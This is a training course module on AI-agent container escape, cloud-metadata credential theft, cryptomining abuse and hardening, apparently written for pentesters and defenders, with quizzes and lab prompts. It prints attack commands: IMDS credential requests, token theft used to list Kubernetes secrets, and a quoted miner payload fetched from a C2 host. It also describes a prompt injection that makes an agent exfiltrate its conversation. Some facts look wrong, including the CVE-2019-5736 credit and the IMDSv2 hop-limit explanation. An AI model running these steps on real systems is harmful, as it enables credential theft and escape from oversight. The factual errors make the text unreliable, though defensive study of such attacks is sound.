Module 6 · Lesson 1

Container Breakout Fundamentals

When the walls that contain an AI agent are thinner than they appear

What documented mechanisms let AI agent workloads escape their intended execution boundary?

In April 2023, security researchers at Wiz disclosed that they had obtained a cross-tenant service account token from within a Hugging Face Spaces container. The token granted read access to private model artifacts belonging to other tenants. The vector was not a kernel exploit — it was an overly permissive IAM role attached to the underlying EC2 instance, reachable from inside any container running on that host via the instance metadata service (IMDS) at 169.254.169.254. The agent workload never needed to escape the container namespace; it simply made an unauthenticated HTTP GET from inside its allowed network context.

Why AI Agent Sandboxes Are Different

Traditional sandboxes confine processes that execute static, known code. AI agent sandboxes must confine processes that generate and execute novel code at runtime — code that the sandbox designer never reviewed. This creates a fundamentally different threat surface. The agent's tool-use loop may invoke shell commands, write files, make outbound network calls, and spawn child processes, all as first-class designed behaviors. The attacker's goal is to chain those permitted behaviors into something the sandbox was not designed to allow.

Sandbox escape in the AI agent context falls into three broad families: namespace escapes (exploiting Linux kernel primitives), metadata service abuse (reaching cloud provider control planes from inside allowed network context), and volume mount exploitation (writing to host-mounted paths). A fourth, increasingly relevant family is agent-driven privilege escalation — where the agent's own tool calls assemble an escape without any single call crossing a policy boundary.

Namespace Escape Primitives

Container runtimes like Docker and containerd isolate workloads using Linux namespaces (PID, NET, MNT, UTS, IPC, USER) and cgroups. Breakouts typically require a privileged capability not stripped at runtime. The most commonly abused:

CAP_SYS_ADMIN Permits mounting filesystems, loading kernel modules, and dozens of other operations. A container with this capability can mount the host's /proc/sysrq-trigger or use nsenter to re-enter the host namespace. Many AI agent orchestrators grant this for "ease of tool use."

CAP_SYS_PTRACE Allows attaching to processes in other namespaces when combined with a shared PID namespace. An agent can ptrace the container runtime process itself if PID namespace sharing is enabled.

--privileged flag Grants all capabilities and disables seccomp/AppArmor. Found in production AI agent deployments where operators want to give agents unrestricted tool access. Immediate full host compromise if code execution is achieved inside the container.

Writable /proc/sys/kernel/core_pattern If the host's /proc is mounted or the container has CAP_SYS_ADMIN, writing a pipe command here causes any core dump to execute arbitrary commands as root on the host.

Pentest Enumeration Checklist

From inside a suspected agent container, run: capsh --print to list current capabilities; check mount | grep proc for overmounted /proc; inspect ls -la /var/run/docker.sock for socket exposure; and attempt curl -s http://169.254.169.254/latest/meta-data/ for IMDS reachability. Any of these returning unexpected output indicates a misconfiguration worth escalating.

The Wiz IMDS Attack Path in Detail

The Hugging Face incident illustrates the canonical IMDS attack path. The instance metadata service runs on a link-local address reachable from any process on the EC2 instance, including containers running on it, unless the operator has configured IMDSv2 (which requires a PUT before GET, making it harder to reach from SSRF vectors) and blocked the address at the container network level.

An agent with any outbound HTTP tool capability can silently reach the IMDS and retrieve the instance role credentials in a single tool call. Those credentials may have permissions extending far beyond the agent's intended scope — S3 buckets, Secrets Manager entries, or even IAM privilege escalation paths.

# Tool call the agent makes (appears legitimate)
GET http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Response reveals role name, then:
GET http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name>

# Returns:
{
  "AccessKeyId": "ASIA...",
  "SecretAccessKey": "...",
  "Token": "...",
  "Expiration": "2023-04-14T18:29:00Z"
}

Defender Note

IMDSv2 alone is insufficient if agents have unrestricted outbound HTTP. The PUT-before-GET requirement stops SSRF-style reaches but not direct tool calls. Network-level blocking of 169.254.169.254 at the container network interface is required. AWS recommends restricting instance profiles to least-privilege and enabling IMDSv2 hop limit of 1 to prevent container-level access.

runc Vulnerabilities (CVE-2019-5736 and Descendants)

CVE-2019-5736, disclosed by Dragos Rusu and Adam Iwaniuk in February 2019, demonstrated that a malicious container could overwrite the host runc binary by racing a file descriptor opened during container execution. The technique required the attacker to control code executing inside the container — exactly the position an AI agent code-execution tool grants. Patched runc versions closed this specific race, but the architectural lesson persists: any code executing inside a container can observe and interact with the host runtime's filesystem operations if the runtime itself runs as root without additional namespace isolation.

Subsequent variants (CVE-2021-30465 for runc mount handling, CVE-2022-0492 for cgroup v1 release_agent) each exploited the same principle: the boundary between container and host is enforced by userspace software running on a shared kernel. Any bug in that software, or any excessive capability granted to the container, collapses the boundary.

Testing Methodology — What Pentesters Look For

When assessing an AI agent deployment for sandbox escape risk, the methodology follows four phases:

Capability enumeration: Identify what Linux capabilities the container process holds. capsh --print, /proc/self/status (CapEff field), and checking --security-opt flags in the orchestration configuration.
Mount surface review: List all bind mounts and volume mounts. Particular attention to any mount that includes a host path containing runtime sockets, /proc subdirectories, or credential stores.
Network reach testing: From inside the container, probe IMDS, the container runtime socket, internal Kubernetes API server (if in a K8s cluster), and any cloud metadata endpoints. Document what is reachable without authentication.
Runtime version fingerprinting: Identify the runc/containerd version and cross-reference against known CVEs. Many production AI agent deployments run on images that are months or years behind on runtime patches.

Real CVE Reference

CVE-2022-0492 (CVSS 7.8): A flaw in Linux kernel cgroup v1 release_agent handling allowed an unprivileged user inside a container to escape if the container had CAP_SYS_ADMIN or if user namespaces were misconfigured. This remained unpatched in many cloud provider managed Kubernetes node images for over three months after disclosure. AI agent workloads on those node versions were trivially escapable if the agent could execute shell commands.

Lesson 1 Quiz

Container Breakout Fundamentals · 3 questions

In the 2023 Wiz Hugging Face Spaces disclosure, what was the primary mechanism that allowed cross-tenant credential access?

Correct. The escape did not require a kernel exploit. The IMDS at 169.254.169.254 was reachable from inside the container, and the EC2 instance role had excessive permissions extending to other tenants' artifacts. This is a configuration error, not a software vulnerability.

Incorrect. The Wiz researchers did not use a kernel capability exploit. The vector was the AWS Instance Metadata Service, reachable via a plain HTTP GET from inside the container's allowed network context.

Which Linux capability, if present in a container, most directly enables mounting the host filesystem and re-entering the host namespace?

Correct. CAP_SYS_ADMIN is the broadest and most dangerous Linux capability. It permits mounting filesystems, loading kernel modules, and a wide range of operations that allow a process to step outside its container namespace. It is sometimes granted to AI agent containers that need to run Docker-in-Docker or access low-level tools.

Incorrect. While CAP_NET_ADMIN and CAP_SYS_PTRACE are dangerous, CAP_SYS_ADMIN is the capability that most directly enables host namespace escape through mount operations and kernel module loading.

CVE-2022-0492 is significant for AI agent security because:

Correct. CVE-2022-0492 exploited the Linux cgroup v1 release_agent mechanism to escape containers. Its significance in the AI context is that many production agent deployments ran on unpatched Kubernetes node images for an extended period after disclosure, leaving any agent capable of shell execution in a position to escape to the host.

Incorrect. CVE-2022-0492 is a Linux kernel vulnerability affecting cgroup v1 release_agent handling, allowing container escape — not a prompt injection or model artifact exposure issue.

Lab 1: Container Reconnaissance

Practice identifying escape vectors from inside a simulated agent container

Scenario

You are a pentester who has achieved code execution inside an AI agent container. Your task is to enumerate the escape surface: capabilities, mounts, network reach, and runtime version. The AI assistant will guide you through the recon process, explain what each finding means, and help you prioritize which vectors are worth escalating.

Start by asking the assistant what commands you should run first to enumerate your container's Linux capabilities, or describe a finding you want to analyze (e.g., "capsh --print shows cap_sys_admin in the Bounding set — what does that mean for escape?").

Container Recon Assistant

Sandbox Escape Lab

Ready for container recon. I can walk you through capability enumeration, mount surface review, IMDS reachability testing, and runtime version fingerprinting. What would you like to start with — or describe a finding you want me to help interpret?

Module 6 · Lesson 2

Cloud Metadata and Credential Theft

How AI agents reach the control plane without ever leaving their container

What attack paths allow an AI agent to exfiltrate cloud credentials using only its permitted tool capabilities?

The Capital One breach, executed by Paige Thompson in July 2019, is the canonical SSRF-to-IMDS attack case. Thompson exploited a misconfigured WAF running on an EC2 instance, used server-side request forgery to reach 169.254.169.254, retrieved an IAM role credential with broad S3 permissions, and exfiltrated approximately 100 million customer records. While not an AI agent attack, the technique is directly applicable to any agent with an HTTP fetch tool and network access to IMDS. The underlying vulnerability — no IMDSv2 enforcement, overly permissive instance role — is reproduced in thousands of AI agent deployments today.

The IMDS Attack Surface for AI Agents

Every major cloud provider exposes an instance metadata service reachable from the instance (and its containers) on a well-known link-local address. AWS uses 169.254.169.254; Azure uses the same address plus 169.254.169.253 for DHCP; GCP uses metadata.google.internal (resolving to 169.254.169.254) and the FQDN metadata.google.internal. All three provide unauthenticated access to instance credentials from within the instance's network namespace.

An AI agent with any HTTP tool — including tools framed as "web browsing," "URL fetcher," "API caller," or "research assistant" — can reach these endpoints. Unlike a human-operated SSRF, the agent may have been instructed by a malicious prompt to make exactly this request while performing an apparently legitimate task.

Provider	Endpoint	Credential Path	Default Protection
AWS	`169.254.169.254`	`/latest/meta-data/iam/security-credentials/<role>`	IMDSv2 (opt-in until 2024); hop-limit 1
Azure	`169.254.169.254`	`/metadata/instance?api-version=2021-02-01` + Metadata:true header	Required header — stops basic SSRF but not tool calls
GCP	`metadata.google.internal`	`/computeMetadata/v1/instance/service-accounts/default/token`	Required header: `Metadata-Flavor: Google`

Critical Note

Azure and GCP require a custom header (Metadata: true and Metadata-Flavor: Google respectively). This stops classic SSRF via image tags or redirects, but does NOT stop an AI agent whose HTTP tool can set arbitrary headers. Pentesters must test with full header control, not just bare GET requests.

Beyond Credentials — What Else IMDS Exposes

Credentials are the most targeted IMDS output, but the endpoint exposes significantly more information useful for lateral movement and escalation:

User data / cloud-init scripts: Often contain hardcoded secrets, bootstrap credentials, or internal API keys. AWS user data is returned at /latest/user-data with no additional authentication.
Instance identity document: Returns account ID, region, instance type, and AMI ID — useful for constructing targeted API calls and identifying the blast radius of compromised credentials.
SSH public keys: In AWS, public keys added via EC2 key pairs are exposed at /latest/meta-data/public-keys/. Knowing the key name and fingerprint narrows the attack surface for lateral SSH movement.
Internal hostname and network topology: Subnet ID, VPC ID, private IP — all useful for mapping the internal network that the agent's instance inhabits.

Kubernetes Service Account Token Theft

When AI agents run inside Kubernetes pods, a different credential source becomes relevant: the service account token automatically mounted at /var/run/secrets/kubernetes.io/serviceaccount/token. This JWT can be used to authenticate to the Kubernetes API server.

The Azurescape vulnerability (disclosed by Palo Alto Unit 42 in August 2021, CVE-2021-25741 adjacent) demonstrated that cross-tenant Kubernetes API access was possible from within a compromised pod in Azure Container Instances. An agent capable of reading its own filesystem can exfiltrate the service account token in a single file read operation.

# Agent reads its own service account token:
cat /var/run/secrets/kubernetes.io/serviceaccount/token

# Then queries the K8s API with it:
curl -k -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" \
  https://kubernetes.default.svc/api/v1/namespaces/default/secrets

# If the service account has get/list on secrets:
# All secrets in the namespace are now exposed

RBAC Misconfiguration Pattern

The most common Kubernetes RBAC misconfiguration seen in AI agent deployments is granting the agent's service account cluster-admin or wildcard resource access so that the agent can "manage Kubernetes resources as a tool." This gives the agent — and any attacker who controls the agent — full cluster access from within a single pod.

Exfiltration Paths via Agent Tool Chains

Once credentials are obtained, the agent's existing tool suite becomes the exfiltration mechanism. An agent with file-write and HTTP-post tools can write credentials to disk, construct a signed AWS API request, and exfiltrate data without invoking any capability outside its normal operation profile. This is why behavioral detection — anomaly detection on tool call sequences — is more reliable than any single policy check.

The 2024 PromptArmor research on indirect prompt injection demonstrated live exfiltration from a GPT-4-powered assistant: a malicious document caused the agent to silently POST its conversation history (which included retrieved credentials) to an attacker-controlled endpoint using the agent's own web request tool. The agent reported success on the original task. No error was raised. The exfiltration was invisible in the response.

Pentest Scenario

When testing an AI agent for credential theft risk: (1) Determine whether the agent has any HTTP fetch capability. (2) Check whether 169.254.169.254 is reachable from the agent's network namespace. (3) Attempt a direct IMDS GET as a tool call. (4) Check /var/run/secrets/ for K8s service account tokens. (5) Read any .env, .aws/credentials, or application config files in the agent's working directory. Document all findings — the goal is a complete picture of every credential the agent could access, not just the most obvious one.

Lesson 2 Quiz

Cloud Metadata and Credential Theft · 3 questions

The Capital One 2019 breach technique is directly relevant to AI agents because:

Correct. Thompson's technique — SSRF to 169.254.169.254, retrieve IAM role credentials, use them for data access — is structurally identical to what any agent with HTTP tool access and a reachable IMDS can do. The agent does not need a WAF misconfiguration; the IMDS is its direct target.

Incorrect. The relevance is that the SSRF-to-IMDS attack path requires only an HTTP fetch capability, which most AI agents have, and a reachable IMDS endpoint. No WAF or special misconfiguration beyond IMDS accessibility is required.

Which statement about Azure and GCP IMDS protection is most accurate for AI agent threat modeling?

Correct. The header requirement was designed to prevent SSRF exploits where an attacker cannot control headers (e.g., via an img src tag). An AI agent's HTTP tool typically allows full header specification, bypassing this protection entirely.

Incorrect. AI agent HTTP tools can typically set arbitrary headers. The Metadata: true and Metadata-Flavor: Google headers are trivially included in a tool call, making them ineffective as protection against deliberate agent-based access.

In a Kubernetes-hosted AI agent pod, where is the service account token that could be used to authenticate to the K8s API?

Correct. Kubernetes automatically mounts the pod's service account token at this path by default (unless automountServiceAccountToken is set to false). An agent capable of reading its own filesystem can extract this token with a single file read and use it to authenticate to the Kubernetes API server.

Incorrect. The Kubernetes service account token is automatically mounted as a file at /var/run/secrets/kubernetes.io/serviceaccount/token in every pod unless explicitly disabled.

Lab 2: Credential Theft Simulation

Map IMDS and service account token attack paths for a deployed agent

Scenario

You are assessing an AI agent deployed on AWS EKS (Elastic Kubernetes Service). The agent has a web-browsing tool and file-read capabilities. Your goal is to enumerate all credential sources it can access and assess the blast radius of each. The assistant will help you construct test cases and interpret what you find.

Begin by asking the assistant how to check whether IMDSv2 is enforced on the EKS nodes, or describe a finding you want to analyze (e.g., "The agent can reach 169.254.169.254 — what permissions does the EKS node role typically have?").

Credential Threat Assessment

IMDS / K8s Token Lab

Let's map the credential attack surface for your EKS-hosted agent. I can help you test IMDS reachability and version enforcement, assess the EKS node IAM role permissions, enumerate Kubernetes service account RBAC, and prioritize findings by blast radius. What would you like to examine first?

Module 6 · Lesson 3

Resource Abuse: Compute, Network, and Storage

When AI agents become unwilling participants in cryptomining, DDoS, and data exfiltration

How do attackers leverage AI agent infrastructure for resource abuse, and what forensic signatures distinguish abuse from normal agent behavior?

TeamTNT, tracked by Trend Micro and Cado Security from 2020 onward, specialized in targeting misconfigured container infrastructure for cryptomining. Their technique: scan for exposed Docker daemons (port 2375/2376), deploy XMRig or similar Monero miners, and in later campaigns, specifically target Jupyter notebook servers — an early form of AI/ML compute abuse. By 2021 their tooling included credential harvesters targeting ~AWS ~/.aws/credentials and Kubernetes config files. The same infrastructure used to run ML experiments was repurposed for mining within minutes of compromise. Container CPU quotas that should have limited blast radius were absent in the majority of compromised targets.

The Resource Abuse Threat Model for AI Agents

AI agent infrastructure is particularly attractive for resource abuse because it is designed to consume significant compute. Anomalous CPU or memory usage from a cryptominer is easy to distinguish from a web server; it blends in with an AI inference workload. Network egress that would trigger alerts on a standard application server is routine for an agent making API calls and fetching external data. This camouflage effect makes AI agent infrastructure a high-value target for attacker-controlled workload injection.

Resource abuse falls into four categories in the AI agent context:

Compute Hijacking Injecting cryptomining, password cracking, or other CPU/GPU-intensive tasks into the agent's execution environment. The agent's allocated compute quota is consumed by attacker workloads.

Network Amplification Using the agent's outbound network access and trusted IP reputation to conduct port scanning, DDoS participation, or spam sending. The agent's IP is not blocklisted; the attacker's source IP is.

Storage Abuse Writing large volumes of data to agent-accessible storage (S3, NFS, local disk) to exhaust quotas, incur costs, or use storage as a staging area for data exfiltrated from other targets.

LLM API Exhaustion Making the agent issue excessive LLM API calls to exhaust rate limits, incur API costs, or probe the underlying model for other tenants' cached context. Specific to AI agent deployments; has no equivalent in traditional application security.

Cryptomining in ML Infrastructure — The Jupyter Attack Surface

Jupyter notebook servers, commonly used to develop and test AI agents, are a documented cryptomining target. Exposed notebooks (no authentication, or with predictable tokens) allow attackers to execute arbitrary Python, which trivially includes subprocess calls to download and run XMRig. The 2020 Aqua Security threat intelligence report documented over 13,000 exposed Jupyter instances and observed cryptomining injection within minutes of exposure for honeypot instances.

The pattern extends to any AI agent framework that exposes a code execution endpoint: LangChain's local server mode, AutoGPT instances with a web interface, and custom agent APIs that allow code submission. Any endpoint that accepts and executes code without authentication is a cryptomining substrate.

# Typical TeamTNT payload delivered via exposed Jupyter notebook:
import subprocess
subprocess.Popen([
    'wget', '-q', 
    'http://[C2-IP]/xmrig', 
    '-O', '/tmp/.cache/xmrig'
])
subprocess.Popen(['chmod', '+x', '/tmp/.cache/xmrig'])
subprocess.Popen([
    '/tmp/.cache/xmrig',
    '--algo', 'rx/0',
    '-o', 'pool.supportxmr.com:3333',
    '--threads', '8'  # Consumes all available CPU
])

Detection Signature

XMRig and similar miners generate distinctive network signatures: outbound connections to mining pool hostnames (pool.supportxmr.com, xmrpool.eu, etc.) or pool IPs on ports 3333, 5555, or 4444; Stratum protocol traffic; and sustained high CPU with low memory I/O ratio. AI agent monitoring should include outbound connection destination analysis, not just HTTP content inspection.

Network Amplification via Agent Egress

An AI agent's outbound network access is granted for legitimate purposes: fetching URLs, calling APIs, sending notifications. An attacker who controls the agent's prompt can redirect this egress capability. The 2023 OWASP LLM Top 10 lists "Excessive Agency" as LLM06 — the condition where an agent has more network, compute, or storage access than its task requires. That excess access is directly exploitable for network abuse.

Port scanning from agent infrastructure is particularly damaging because: (1) the agent's IP has a clean reputation, (2) scan traffic appears as normal outbound from a legitimate cloud customer, and (3) the agent can distribute scans across many target IPs in what appears to be routine API calls or URL fetches. This technique has been observed in post-compromise scenarios where compromised CI/CD agents with broad network access were used to scan internal network ranges.

LLM API Cost Abuse

A category unique to AI agent systems: an attacker who can influence the agent's behavior (via prompt injection, malicious tool outputs, or direct API access) can cause it to issue massive numbers of LLM API calls. This does not require code execution — it requires only the ability to cause the agent to enter a loop or process an arbitrarily large input.

The sponge attack technique, described in academic literature by Shumailov et al. (2021), demonstrates that inputs can be crafted to maximize inference compute consumption by targeted LLM deployments. Applied to an agentic system, a crafted document could cause an agent to spend minutes of inference time per document, exhaust its API quota, and either fail its primary task or generate costs that exceed any expected budget.

Cost Abuse Real-World Scale

AWS bills compute costs in real time. A misconfigured AI agent with no spending limits that is hijacked for cryptomining or caused to make excessive API calls can generate thousands of dollars in charges before automated billing alerts fire. Organizations running AI agents on cloud infrastructure should set hard spending limits, CloudWatch billing alarms, and consider AWS Cost Anomaly Detection as an early warning mechanism.

Forensic Signatures of Resource Abuse

Distinguishing resource abuse from normal AI agent behavior requires baseline-relative analysis. A well-instrumented agent deployment should capture:

CPU utilization curve: Miners cause sustained high CPU with no I/O variance. Normal agents have bursty CPU correlated with task events.
Outbound connection destinations: Log all unique destination IPs and ports. Mining pools, Tor exit nodes, and unfamiliar cloud regions are anomalous for most agent workloads.
File system write patterns: Sudden creation of executable files in /tmp, /dev/shm, or hidden directories is characteristic of malware staging.
Process tree anomalies: Child processes spawned by the agent runtime that are not expected framework processes — particularly processes with randomized names or matching known malware hashes.
LLM API call rate: Track tokens consumed per unit time. A 10× spike in token consumption with no corresponding user-visible output suggests a prompt injection loop.

Lesson 3 Quiz

Resource Abuse · 3 questions

Why is AI agent infrastructure particularly attractive for cryptomining attackers compared to standard web application servers?

Correct. The camouflage effect is the key differentiator. A spike in CPU from a web server is immediately anomalous; the same spike from an AI inference workload is expected behavior. TeamTNT's targeting of Jupyter and ML infrastructure specifically exploited this fact.

Incorrect. The primary advantage for attackers is camouflage — high CPU from a cryptominer is indistinguishable from legitimate inference load without more detailed behavioral analysis.

The "sponge attack" technique (Shumailov et al., 2021) threatens AI agent deployments by:

Correct. Sponge attacks craft inputs specifically to maximize compute resources consumed during inference. Applied to agents, this can exhaust API quotas, generate unexpected costs, and degrade service for legitimate users — all without requiring code execution or credential access.

Incorrect. Sponge attacks maximize inference compute consumption through specially crafted inputs that cause the model to expend maximum computation. They require no code execution — only the ability to send inputs to the agent.

Which forensic indicator most reliably distinguishes cryptomining from normal AI agent behavior when monitoring process telemetry?

Correct. The combination of sustained high CPU (not event-correlated) plus Stratum protocol connections to mining pool endpoints on characteristic ports is the most reliable dual signal. Either alone could have an innocent explanation in an AI workload; together they are highly indicative of mining activity.

Incorrect. Threshold-based CPU alerts and generic process name monitoring produce too many false positives for AI workloads. The combination of sustained CPU pattern plus specific outbound connection destinations is the more reliable indicator.

Lab 3: Resource Abuse Detection

Analyze telemetry to identify cryptomining and network abuse in an agent workload

Scenario

You are reviewing monitoring data from an AI agent fleet and have noticed anomalies. Your task is to analyze the telemetry, determine whether resource abuse is occurring, identify the abuse type, and recommend containment steps. The assistant will help you interpret signals and construct detection rules.

Start by describing anomalous telemetry you want to analyze (e.g., "Agent CPU is running at 94% for 45 minutes with no active tasks, and I see outbound connections to pool.supportxmr.com:3333"), or ask the assistant how to build a detection baseline for an agent workload.

Resource Abuse Analyst

Compute / Network Abuse Lab

Ready to analyze resource abuse telemetry. I can help you interpret CPU, network, and filesystem signals; distinguish mining from normal inference load; build detection rules; and recommend containment responses. Describe your anomaly or ask me how to establish a behavioral baseline.

Module 6 · Lesson 4

Defenses, Detection, and Hardening

Practical controls that actually reduce sandbox escape and resource abuse risk

What layered defenses most effectively prevent and detect sandbox escape and resource abuse in AI agent deployments?

At AWS Re:Inforce 2023, the Amazon security team presented their internal approach to containing agentic workloads: cell-based architecture where each agent instance runs in a dedicated AWS Firecracker microVM with no shared kernel, no shared instance, and no IMDS access (IMDSv2 disabled at the VPC level). Firecracker — the same hypervisor underlying AWS Lambda — provides kernel-level isolation rather than namespace-level isolation. The escape surface is reduced to hypervisor vulnerabilities rather than container runtime vulnerabilities. The practical cost: ~125ms cold start latency per agent invocation. For most enterprise agent deployments, this is acceptable. For real-time interactive agents, it requires architectural adjustments.

Defense in Depth: The Layered Approach

No single control eliminates sandbox escape risk. The goal is to increase the number of controls an attacker must bypass, reduce the blast radius when one layer fails, and ensure that detection can identify the failure before full compromise occurs. The following framework organizes controls from innermost (agent process) to outermost (cloud account):

Layer	Control	Threat Addressed	Implementation
Process	Drop all capabilities; use seccomp default-deny	Kernel namespace escape via CAP_SYS_ADMIN and siblings	`--cap-drop=ALL --security-opt seccomp=profile.json`
Container	Read-only root filesystem; tmpfs for /tmp	Malware staging in container filesystem	`--read-only --tmpfs /tmp:size=50m`
Runtime	gVisor (runsc) or Firecracker isolation	runc CVEs and shared kernel exploitation	RuntimeClass: gvisor in Kubernetes pod spec
Network	Block 169.254.169.254 at CNI level; allow-list egress	IMDS credential theft	NetworkPolicy or iptables rule pre-container start
Identity	Dedicated least-privilege service account; no cluster-admin	K8s API abuse via service account token	RBAC with explicit verb/resource grants only
Account	Hard spending limits; Cost Anomaly Detection; separate billing account	LLM API cost abuse; compute hijacking	AWS Budgets; GCP quota limits; Azure cost alerts

gVisor: The Practical Middle Ground

Google's gVisor (open-sourced 2018) interposes a user-space kernel between container processes and the host Linux kernel. Container syscalls are handled by the Sentry (gVisor's kernel implementation) rather than passed directly to the host. This means that the container cannot reach host kernel vulnerabilities directly — it must first compromise the Sentry.

Google Cloud's GKE Sandbox uses gVisor for untrusted workloads. The GKE documentation explicitly recommends it for "workloads that execute untrusted code" — a description that accurately characterizes any AI agent that executes LLM-generated code. The performance overhead is approximately 10–20% for typical workloads, increasing for syscall-intensive operations.

gVisor does not prevent IMDS access (it operates at the syscall level, not the network level), and does not prevent a container from using its permitted network access to reach internal services. It is a kernel isolation control, not a network isolation control.

Network Controls: Blocking IMDS and Egress Filtering

Blocking IMDS at the network level is the most reliable protection against credential theft via metadata service. The implementation depends on the deployment environment:

Docker standalone: iptables -I DOCKER-USER -d 169.254.169.254 -j DROP before starting agent containers. This rule persists across container restarts but must be applied to each host.
Kubernetes: A NetworkPolicy that selects agent pods and denies egress to 169.254.169.254/32. Additionally, configure the CNI (Calico, Cilium) to enforce this at the dataplane level, as NetworkPolicy alone may not be enforced by all CNI plugins.
AWS EKS: IMDSv2 with hop-limit 1 prevents container-level IMDS access (hop-limit 1 means the PUT token request will not be forwarded from the container to the instance). Verify this is set: aws ec2 describe-instances --query 'Reservations[].Instances[].MetadataOptions'.
Egress allow-list: Define the specific external endpoints the agent legitimately needs to reach. Block all other egress. This eliminates the network amplification abuse vector and makes exfiltration via the agent's HTTP tool observable as an anomaly.

IMDSv2 Hop Limit Detail

IMDSv2 uses a PUT request to obtain a session token before GETs are accepted. By setting the instance metadata hop limit to 1 (the default is 1 for new instances as of 2024), the PUT TTL value is decremented to 0 before it exits the instance network interface. Container packets traversing the virtual NIC have already consumed one TTL hop. This means the container's PUT never reaches the IMDS, and no session token is issued — blocking all IMDSv2 access from containers without blocking it from processes on the host itself.

Resource Quotas and Cgroups

Cgroup-based resource limits are a necessary but insufficient control against resource abuse. A container CPU limit of 0.5 cores prevents a miner from consuming all host CPU, but the miner still runs, generates costs, and produces external network signatures. Resource limits should be set at realistic values based on measured normal agent behavior, not arbitrary defaults. Limits set too high provide no meaningful protection; limits set too low cause legitimate agent task failures.

In Kubernetes, resource limits should be set in the pod spec for both requests and limits. Requests affect scheduling; limits affect cgroup enforcement. For AI agent pods, set CPU limits based on 95th percentile observed inference CPU, and memory limits based on maximum expected context size plus a 20% buffer.

# Kubernetes resource limits for AI agent pod
resources:
  requests:
    cpu: "500m"
    memory: "1Gi"
  limits:
    cpu: "2000m"     # 2 cores max — limits miner impact
    memory: "4Gi"    # Prevents memory-based DoS
    ephemeral-storage: "1Gi"  # Prevents storage abuse

Runtime Detection: eBPF-Based Monitoring

Falco (CNCF, originally from Sysdig) uses eBPF to observe kernel syscalls and generate alerts on anomalous behavior. For AI agent sandboxes, the most valuable Falco rules are those that detect: unexpected process spawning from the agent runtime, outbound connections to unexpected destinations, writes to executable paths outside expected working directories, and attempts to read sensitive filesystem paths like /proc/self/mem or service account tokens.

The 2022 Sysdig Threat Research Team documented a Falco rule set specifically targeting cryptominer behavior: detection of processes whose binary names match known miner hashes, and detection of connections to mining pool hostnames extracted from public threat intelligence feeds. These rules run at kernel level with negligible performance overhead and cannot be evaded by the container process itself.

Pentest Validation Checklist

After implementing defenses, validate with the following tests: (1) Attempt IMDS GET from inside agent container — should receive connection refused or timeout. (2) Attempt to read /var/run/secrets/ — verify mount is absent or the service account token has minimal RBAC. (3) Check capsh --print — verify CapEff shows no dangerous capabilities. (4) Attempt to spawn a process outside the expected agent runtime — verify Falco generates an alert. (5) Attempt to write an executable to /tmp — verify it is either blocked (read-only filesystem) or immediately detected. Document pass/fail for each test with evidence.

Service Mesh and Zero-Trust Networking

A service mesh (Istio, Linkerd) provides mutual TLS between services and allows policy-based enforcement of which agent pods can communicate with which internal services. This adds an authentication layer that is independent of network-level IP allow-lists. Even if an agent escapes its container namespace, the service mesh sidecar enforces identity-based policy — the escaped process does not have the service account certificate required to authenticate to other services.

Zero-trust networking for AI agents means: no agent can call any internal service by default. Each inter-service communication requires an explicit policy grant. This is operationally demanding but dramatically reduces the blast radius of any single agent compromise.

Lesson 4 Quiz

Defenses, Detection, and Hardening · 3 questions

Amazon's cell-based architecture for agent workloads (as presented at Re:Inforce 2023) achieves stronger isolation than standard container runtimes because:

Correct. Firecracker provides microVM isolation — each agent's kernel is separate from the host kernel. An escape requires compromising the hypervisor, not just the container runtime. This is a fundamentally stronger boundary than Linux namespace isolation, at the cost of slightly higher cold start latency (~125ms).

Incorrect. The key mechanism is Firecracker microVM isolation — each agent gets its own kernel. This eliminates shared-kernel exploitation paths that affect container runtimes like runc/containerd.

Setting the IMDSv2 hop limit to 1 on an EKS node prevents container-level IMDS access because:

Correct. IMDSv2 PUT requests carry a TTL that is decremented at each network hop. A container's packet traverses the virtual network interface before reaching the instance, consuming the one allowed hop. The IMDS receives a packet with TTL=0 and discards it. Host processes communicate directly without the NIC hop, so they still receive a valid TTL=1 PUT.

Incorrect. The hop limit mechanism works via TTL: the container's PUT request is decremented to TTL=0 before reaching IMDS because it traverses the virtual NIC. This elegantly blocks container access while preserving host-level access.

gVisor protects against which of the following threats, but does NOT protect against which?

Correct. gVisor interposes at the syscall boundary, preventing container processes from directly invoking host kernel code — this defeats runc CVEs and kernel namespace exploits. However, gVisor does not filter network traffic. A container running under gVisor can still reach 169.254.169.254 and make arbitrary outbound connections. Network controls are still required separately.

Incorrect. gVisor operates at the syscall level — it interposes between container processes and the host kernel. This protects against kernel exploitation but does not filter network traffic. IMDS access and outbound network abuse require separate network-level controls.

Lab 4: Hardening Design Review

Build a defense-in-depth configuration for a production AI agent deployment

Scenario

Your organization is deploying a LangChain-based AI agent on AWS EKS. The agent has web-browsing, file-read, shell-execution, and external API call tools. You need to design the complete security configuration: container hardening, network controls, RBAC, runtime isolation, and detection. The assistant will review your proposed configurations and identify gaps.

Start by describing your proposed container configuration (e.g., capabilities dropped, seccomp profile, read-only filesystem) and asking the assistant to identify gaps — or ask the assistant where to begin designing the security configuration for an agent with shell execution capabilities.

Hardening Design Reviewer

Defense Configuration Lab

Ready to review your agent hardening design. I can evaluate container capability configuration, network isolation controls, Kubernetes RBAC, runtime isolation choices (gVisor, Firecracker), and detection coverage. Describe your proposed configuration or tell me about the agent's tool set and I'll suggest where to start.

Module 6 Test

Sandbox Escape and Resource Abuse · 15 questions · Pass at 80%

1. In the 2023 Wiz Hugging Face Spaces disclosure, no kernel exploit was required because the attacker could reach what resource from inside the container?

Correct.

Incorrect. The IMDS at 169.254.169.254 was the attack vector — reachable via plain HTTP GET with no kernel exploit required.

2. CVE-2019-5736 allowed a malicious container to compromise the host by:

Correct. The runc binary overwrite via file descriptor race is the core mechanism of CVE-2019-5736.

Incorrect. CVE-2019-5736 exploited a race condition against the runc binary itself — the container process could overwrite the host runc by racing a file descriptor opened during container startup.

3. When a Kubernetes pod is started, what credential is automatically available to the container process by default?

Correct.

Incorrect. By default, Kubernetes mounts the pod's service account token at /var/run/secrets/kubernetes.io/serviceaccount/token. IRSA is an optional additional mechanism.

4. Which Linux capability must be present for a container process to mount filesystems and use nsenter to re-enter the host namespace?

Correct. CAP_SYS_ADMIN is the broadest and most dangerous capability, enabling mount operations and namespace manipulation.

Incorrect. CAP_SYS_ADMIN is required for mounting filesystems and namespace manipulation.

5. Google Cloud's GCP IMDS protection requires a specific HTTP header. Why is this insufficient to protect against AI agent-based credential theft?

